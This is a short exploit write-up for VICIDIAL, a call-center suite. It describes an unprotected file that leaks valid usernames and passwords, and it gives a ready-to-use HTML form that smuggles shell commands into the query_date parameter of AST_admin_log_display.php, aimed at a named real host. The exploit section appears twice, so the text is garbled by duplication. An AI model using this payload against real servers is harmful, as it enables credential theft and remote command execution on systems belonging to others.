VICIDIAL Vulnerability
VICIDIAL is a set of programs that are designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound call center suite. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer.
More information could be found at http://astguiclient.sourceforge.net/vicidial.html
Exploiting..
On the demo site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access thus giving out valid usernames and passwords. More info can be gotten from the file admin_changes_log.txt.
Once we have a valid username and password we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would be something like
<form action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get">
<input maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date">
<input type="submit" value="SUBMIT" name="SUBMIT">
</form>
Change the host and directory if needed and save as an .htm file. Spaces would appear to be filtered
More information could be found at http://astguiclient.sourceforge.net/vicidial.html
Exploiting..
On the demo site, which we assume is a default install, the file project_auth_entries.txt does not seem to be protected from direct access thus giving out valid usernames and passwords. More info can be gotten from the file admin_changes_log.txt.
Once we have a valid username and password we can execute shell commands by exploiting the AST_admin_log_display.php script. An exploit would be something like
<form action="http://www.eflo.net/vicidial/AST_admin_log_display.php" method="get">
<input maxlength="500" size="50" value="1;$replace_this_with_your_cmd;" name="query_date">
<input type="submit" value="SUBMIT" name="SUBMIT">
</form>
Change the host and directory if needed and save as an .htm file. Spaces would appear to be filtered
